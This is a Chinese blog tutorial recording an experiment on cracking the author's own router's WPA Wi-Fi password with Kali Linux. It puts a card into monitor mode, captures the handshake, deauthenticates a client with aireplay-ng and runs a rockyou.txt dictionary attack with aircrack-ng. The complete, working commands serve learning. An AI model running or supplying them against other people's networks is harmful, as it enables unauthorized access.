无线网络密码破解初体验

实验准备

准备一台路由器、可以设置为混杂模式的无线网卡和kali linux

本次实验破解的WiFi基本信息如下:

img

获取当前环境Wi-Fi

1. 查看当前无线网卡工作模式

iwconfig wlan0

如:

┌──(shelmean㉿kali)-[~]
└─$ iwconfig wlan0
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

2. 设置网卡为混杂模式

设置为混杂模式(Monitor)时会提示需要kill掉一些干扰进程,使用 airmon-ng check kill 可以kill掉干扰进程

sudo airmon-ng start wlan0

如下,设置为混杂模式后 wlan0 变成了 wlan0mon

┌──(shelmean㉿kali)-[~]
└─$ sudo airmon-ng start wlan0
[sudo] shelmean 的密码:
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
411 NetworkManager
576 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 mt76x2u MediaTek Inc. MT7612U 802.11a/b/g/n/ac
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
┌──(shelmean㉿kali)-[~]
└─$ ifconfig
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 400 (400.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 400 (400.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 8C-88-2B-10-04-16-30-30-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 1821 bytes 574539 (561.0 KiB)
RX errors 0 dropped 1821 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(shelmean㉿kali)-[~]
└─$ iwconfig wlan0mon
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on

3. kill掉干扰进程

┌──(shelmean㉿kali)-[~]
└─$ sudo airmon-ng check kill
Killing these processes:
PID Name
576 wpa_supplicant

4. 扫描附近 Wi-Fi

sudo airodump-ng wlan0mon

img

抓取四次握手报文

1. 指定抓取指定无线网络的报文

sudo airodump-ng -c 6 --bssid 24:6F:8C:80:16:60 -w mercury.cap wlan0mon

测试 Wi-Fi 为 ABC-Mercury-2.4G,扫描出来看到 BSSID 为 24:6F:8C:80:16:60 信道为 6

抓取的报文保存为 mercury.cap

目前有两个Station连接在上面,其中 9C:28:F7:9A:1B:14 为我自己的手机Mac

img

2. 将station踢下线

为了抓取四次握手报文,新开一个 terminal,使用 aireplay-ng 攻击工具将 station 踢下线

aireplay-ng -0 5 -a 24:6F:8C:80:16:60 -c 9C:28:F7:9A:1B:14 wlan0mon

img

然后等手机重连,可以看到抓取到了握手报文

img

3. 跑字典

rockyou.txt 为字典文件

aircrack-ng -w rockyou.txt -b 24:6F:8C:80:16:60 mercury.cap-01.cap

img

短短几分钟就找到我们路由器的密码了

posted @   shelmean  阅读(2214)  评论(4编辑  收藏  举报
编辑推荐:
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
点击右上角即可分享
微信分享提示